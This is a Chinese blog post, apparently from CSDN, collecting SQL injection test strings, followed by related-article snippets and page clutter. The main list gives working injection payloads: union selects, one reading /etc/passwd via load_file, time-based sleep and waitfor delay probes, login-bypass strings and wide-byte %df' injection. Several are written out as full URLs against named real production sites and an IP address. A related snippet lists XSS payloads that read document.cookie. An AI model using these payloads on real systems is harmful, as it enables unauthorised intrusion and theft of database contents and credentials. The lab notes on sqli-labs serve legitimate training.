搜集常见的测试语句

最新推荐文章于 2024-06-12 20:20:46 发布
原创 最新推荐文章于 2024-06-12 20:20:46 发布 · 635 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文提供了多个SQL注入的实际案例,包括常见的字符串型、数字型及宽字节注入等,并展示了如何利用这些技巧进行测试和攻击。

SQL:注入篇:

    http://www.wooyun.org/bugs/wooyun-2010-0114928

http://weixin.family.baidu.com/index.php/site/user_t?id=1%27%20union%20select%201,2,version%28%29,4%20--%20;
http://www.wooyun.org/bugs/wooyun-2010-0105423
"https://jpaas-edu.baidu.com/xplatfe/invite/api_use_invite_code?invite_code=123' or 1=(1=".$_GET['sql'].") limit 1--+&verify=7kpc"
http://180.149.139.84/api/api.php?action=info&virtualserver=fe-dpool_wb_head_pic%27%20union%20select%201,2,3,4,5,6,7,8,9,10,11,load_file%28%27/etc/passwd%27%29,13%20--%20;
lijiejie的stirng型注入语句:
 id=17' and sleep(5)#;//有时注意and的短路原则,似乎用or更好
id=(sleep(length(user())=18)),id=1235-1(12345-length(user()))
 abc' and/or (select  *  from  (select(sleep(10)))b) and '1'='1  //sqlmap经典延时语句了的
http://kact.kingdee.com/world/createArticle?corp_id=aaa'XOR(if(length(user())=20,sleep(3),0))OR'bbb(无空格吊炸天语句)


登陆框注入的密码:
admin' or 1=1# 密码随意


admin' or '1'='1' -- ;



伪静态相关:(一般延时注入比较多见奏效)


http://www.wooyun.org/bugs/wooyun-2010-0119845   or   if(length(database(),1,1)<5,sleep(1),1)



http://www.wooyun.org/bugs/wooyun-2010-0119490  延时注入:waitfor delay '0:0:5'--  相关语句  xnjodhe'; waitfor delay '0:0:5' --



常见于搜索型的注入


 http://www.wooyun.org/bugs/wooyun-2010-0118356   abc' or "='  ; %' and  1=1  and '%‘=’%


还有http头部注射类型:clenmt-ip,user-agent之类的


一般post,ajax,api处隐藏的问题比较多吧


字符型测试案例:


1' and 1=1--   http://t2.easou.com/zone/mobile/mobilekey/key/0/breed_id/1' and 1=1-- /mid/1100/ou/rurl  http://www.wooyun.org/bugs/wooyun-2010-092366(伪静态案例)


1' and '1'='1,1 and '1'='2


  http://ldj.db.17173.com/showInfo.php?a=1&id=(sleep(length(user())=18))


宽字节注入案例:


http://www.wooyun.org/bugs/wooyun-2010-0134651  %df'



http://www.wooyun.org/bugs/wooyun-2010-0133613 (聪明的小伙子)運











数字型测试案例:


1 and sleep(5)








                

        

    



  



    



                



	

		

			

				
					
linux测试语句

				
			

			

				

					timeless的博客
				

				

					10-14
					
					1242
					
				

			

		

		

			
				
今天在某段shell脚本中看到一段
[ ! -e $WORKSPACE/omnisocials-frontend ] && git clone git@git.augmentum.com.cn:scrm/omnisocials-frontend.git -b $FRONTEND_BRANCH
前面半段还是第一次见,推测应该和判断有关,搜了一下,结果如下

条件测试语法能够判断表达式是否成立

			
		

	



                

            
              



	

		

			

				
					
Django常见命令语句

				
			

			

				

					01-20
				

			

		

		

			
				
在使用Django的过程中,有一些常见的命令语句是开发者经常需要用到的。以下将详细解释这些命令及其作用:  1. **创建表结构**:  `python manage.py migrate`  这个命令用于同步数据库模型与数据库表结构。当你在...

			
		

	



              


  
              

                


	

		

			

				
					
测试相关语句

				
			

			

				

					qqzhouzhou的专栏
				

				

					01-31
					
					211
					
				

			

		

		

			
				
huih78(北京) 发表于 2009-02-01

.静态测试:Non-Execution-Based Testing或Static testing? 代码走查:Walkthrough? 代码审查:Code Inspection?? 技术评审:Review2.动态测试:Execution-Based Testing3.白盒测试:White-Box Testing4.黑盒测试:Black-Box ...

			
		

	





	

		

			

				
					
sql测试语句

				
			

			

				

					12-13
				

			

		

		

			
				
mysql数据库sql语句测试,包含crud,日期函数,字符函数,聚合函数等 ,还有隐式转换和死锁检测。

			
		

	



		

			
		



	

		

			

				
					
测试语句

				
			

			

				

					weixin_45043768的博客
				

				

					09-19
					
					828
					
				

			

		

		

			
				
的积极的技术开发  而非我额

			
		

	





	

		

			

				
					
测试人员要掌握的基本的SQL语句

				
			

			

				

					L-Wolf
				

				

					05-17
					
					1105
					
				

			

		

		

			
				
目录  一、DDL—数据定义语言(CREATE,ALTER,DROP,DECLARE)  二、DML—数据操纵语言(SELECT,DELETE,UPDATE,INSERT)  三、DCL—数据控制语言(GRANT,REVOKE) 四、下半部分内容(主要是PL/<span class="t_tag" onclick="function onclick(){tagshow(event)}"

			
		

	





	

		

			

				
					
JavaScript_用单元测试收集最常见的JS面试问题.zip

				
			

			

				

					05-20
				

			

		

		

			
				
这个压缩包“JavaScript_用单元测试收集最常见的JS面试问题.zip”显然是为了帮助求职者准备JavaScript面试,特别是涉及到单元测试的部分。以下是一些相关的JavaScript和单元测试知识点:  1. **JavaScript基础**:...

			
		

	





	

		

			

				
					
SQL性能测试工具用于优化查询语句

				
			

			

				

					
				

			

		

		

			
				
结合描述“从网上找的,就传了,用于测试sql语句的性能,SQL测试工具.rar”,可以判断这是一份收集自网络并经过整理打包的实用型数据库性能测试资源,其主要目标是帮助数据库开发人员、DBA(数据库管理员)以及系统...

			
		

	





	

		

			

          精选资源
				
					
广东医疗机构病案统计管理系统-病案系统常见问题、SQL语句基本的应用.ppt

				
			

			

				

					10-19
				

			

		

		

			
				
【广东医疗机构病案统计管理系统】是一个专门用于管理医疗机构病案数据的系统,旨在高效地收集、整理和分析病案信息,以支持医疗决策、质量控制和科学研究。在使用该系统时,用户可能会遇到一系列常见问题,包括病案...

			
		

	





	

		

			

				
					
软件测试人员常见面试题.doc

				
			

			

				

					10-03
				

			

		

		

			
				
 - 测试数据分析:收集并分析测试结果。  10. LoadRunner测试流程:  - 需求分析。  - 创建虚拟用户脚本。  - 设计运行场景。  - 执行测试脚本。  - 监视场景性能。  - 分析测试结果,评估软件性能。  以上是软件...

			
		

	





	

		

			

				
					
if/case条件测试语句

					
最新发布

				
			

			

				

					扮瘦人的博客
				

				

					06-12
					
					1392
					
				

			

		

		

			
				
if,case的基本用法

			
		

	





	

		

			

				
					
Shell中的测试语句

				
			

			

				

					hy199707的博客
				

				

					01-25
					
					1712
					
				

			

		

		

			
				
在Shell脚本中,条件判断主要用于控制程序的执行流程Shell 脚本有时还要判断用户输入的参数,例如像 mkdir 命令一样,当目录不存在则创建,若已经存在则报错,条件测试语句能够测试特定的表达式是否成立,当条件成立时返回值为 0,否则返回其他数值。

			
		

	





	

		

			

				
					
条件测试语句和逻辑测试语句

				
			

			

				

					weixin_30650039的博客
				

				

					09-19
					
					305
					
				

			

		

		

			
				
条件测试语句
  [  条件表达式  ]      两边均有空格,条件测试语句不能配合管道符
文件测试的参数
  -d      测试文件是否为目录类型  -e      测试文件是否存在  -f      查看是否为一般文件  -rwx  r、判断用户是否有读取权限      w、判断用户是否有写入权限      x、判断用户是否有执行权限

...

			
		

	





	

		

			

				
					
自学shell编程——第2讲(test测试语句/if语句/case语句

				
			

			

				

					weixin_44616693的博客
				

				

					04-14
					
					1373
					
				

			

		

		

			
				
自学shell编程——第2讲(if语句与test测试语句)
shell中用到的分支语句:if-then-else-fi语句;case-esac语句。控制语句:for语句;while语句;until语句
1. test测试语句,test相当于ls一类,属于shell命令
根据测试对象,将test语句分为三大类。

文件。可以判断是否存在(-e)、是否可读(-r)、是否可写(-w)、是否可执行(-x)、是否是目录(-d)、是否是普通文件(-f)、是否非空(-s)。
两个字符串或单个字符串。可以判断是否相同(=)

			
		

	





	

		

			

				
					
常用xss测试语句

				
			

			

				

					weixin_39157582的博客
				

				

					01-26
					
					5582
					
				

			

		

		

			
				
&amp;lt;img src=1 alert(1)&amp;gt; (显示1)

&amp;lt;script&amp;gt;alert(&quot;xss&quot;)&amp;lt;/script&amp;gt; (显示xss)

&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt; (显示cookie)

&am

			
		

	





	

		

			

				
					
【shell编程】第二章:条件测试语句

				
			

			

				

					qq_48896417的博客
				

				

					05-29
					
					331
					
				

			

		

		

			
				
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档

第二章:条件测试语句前言一、知识点(一)条件测试1、语法2、test条件测试语句3、[]条件测试语句4、字符串比较测试:5、数值比较测试:(二)小结二、案例脚本1.(())运算命令例子2.let命令使用:一个检测网站存活的脚本3.expr命令使用:判断文件类型4.一个安装lnmp、lamp的脚本

前言
条件测试语句:
- 条件测试
- 数值运算
- if条件判断

一、知识点
(一)条件测试
1、语法


2、test条件测试语句
语法.

			
		

	





	

		

			

				
					
shell知识点:比较(测试语句

				
			

			

				

					silly8543
				

				

					05-10
					
					311
					
				

			

		

		

			
				
shell测试语句

			
		

	





	

		

			

				
					
sqli-labs(23-27a)

				
			

			

				

					qq_43579362的博客
				

				

					02-12
					
					807
					
				

			

		

		

			
				
Less-23
1.打开页面正常操作,http://127.0.0.1/sqlilabs/Less-23/?id=1,页面回显正常

2.加单引号,回显错误,根据错误提示可知闭合方式'--+/'#,但是两者输入后页面还是报错,

3.可能存在对--和#的过滤,所以尝试构造1'or'1'='1,回显正常,说明闭合成功,可以开始注入,这里可以采用updatexml()报错注入

Less-24
二次注...

			
		

	





	

		

			

				
					
Sqli-lab注入靶场 1-10笔记

				
			

			

				

					m0_59343440的博客
				

				

					01-17
					
					2484
					
				

			

		

		

			
				
通关大致思路:

1.判断注入点
2.通过报错信息知道如何闭合参数
3.猜字段数及其回显
4.构造语句获取想要的信息

Less1GET - Error based - Single quotes - String(基于错误的GET单引号字符型注入)



url中添加get参数?id=1,即

http://127.0.0.1/sqli-labs-master/Less-1/?id=1进入注入页面。



判断是否有注入点
先输入and 1=1 and 1=2代判断是否是整型注入(因为and 1=1与..

			
		

	



              




          




        



    





    



      

      

        
      

      





	

		评论	
	

  
	




  

    

      添加红包
      
    

    

      

        
        

          
          
        

        
请填写红包祝福语或标题

      

      

        
        

          
          
        

        
红包个数最小为10个

      

      

        
        

          
          
        

        
红包金额最低5元

      

      

        
        

          当前余额3.43前往充值 >
        

      

      

        

          需支付:10.00

        
        
      

    

  





  

    
    
  

  

    
    
  








  

    

      

        

          

            
            
成就一亿技术人!

          

          

        

        

          

          

            领取后你会自动成为博主和红包主的粉丝
            规则
          

        

      

      

        

          

            
              
            
            

              
hope_wisdom
 发出的红包
            

          

        

        

          

          

          

        

      

    

    

  



      
      

      
实付

      
使用余额支付

      

        

          

            
            点击重新获取
          

        

        
扫码支付

      

      

        
          
            
          
          
        
      

      

        
        钱包余额
          0
          

            
            

              

                
抵扣说明:

                
 1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
 2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

              

            

          

      

      余额充值